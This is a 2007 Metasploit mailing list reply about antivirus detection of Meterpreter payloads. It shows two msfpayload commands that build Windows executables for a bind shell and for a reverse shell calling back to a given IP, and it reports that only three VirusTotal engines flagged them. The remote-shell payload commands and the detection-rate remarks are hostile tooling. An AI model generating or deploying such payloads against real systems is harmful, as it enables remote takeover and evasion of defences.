Metasploit mailing list archives

Connect to a remote windows host with valid credentials (no exploit)


From: grutz at jingojango.net (Kurt Grutzmacher)
Date: Fri, 1 Jun 2007 15:13:01 -0500

On Fri, Jun 01, 2007 at 04:50:23PM +0200, Nicolas FR wrote:
> - Kaspersky 6.0 detects the payload and blocks the .exe when the exploit is
> launched (warning about "Buffer Overflow"); Kaspersky does a good job on
> this, I am positively surprised.

I made a meterpreter listener and reverse and uploaded them to virustotal.com:

$ ./msfpayload windows/meterpreter/bind_tcp LPORT=5512 X > metbind-5512.exe
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.221.55.2 LPORT=5512 X > metreverse-5512.exe

Only three found them suspicious: Fortinet 2.85.0.0, Panda 9.0.0.4 and
Webwasher-Gateway 6.0.1. That could change in the future. Symantec 10
used to complain, not sure what changed.  :)

If only a clean EXE would be created with a real exit() call or
something. Having the debug handler kick in after doing a 'quit' really
sucks.

-- 
                 ..:[ grutz at jingojango dot net ]:..
     GPG fingerprint: 5FD6 A27D 63DB 3319 140F  B3FB EC95 2A03 8CB3 ECB4
        "There's just no amusing way to say, 'I have a CISSP'."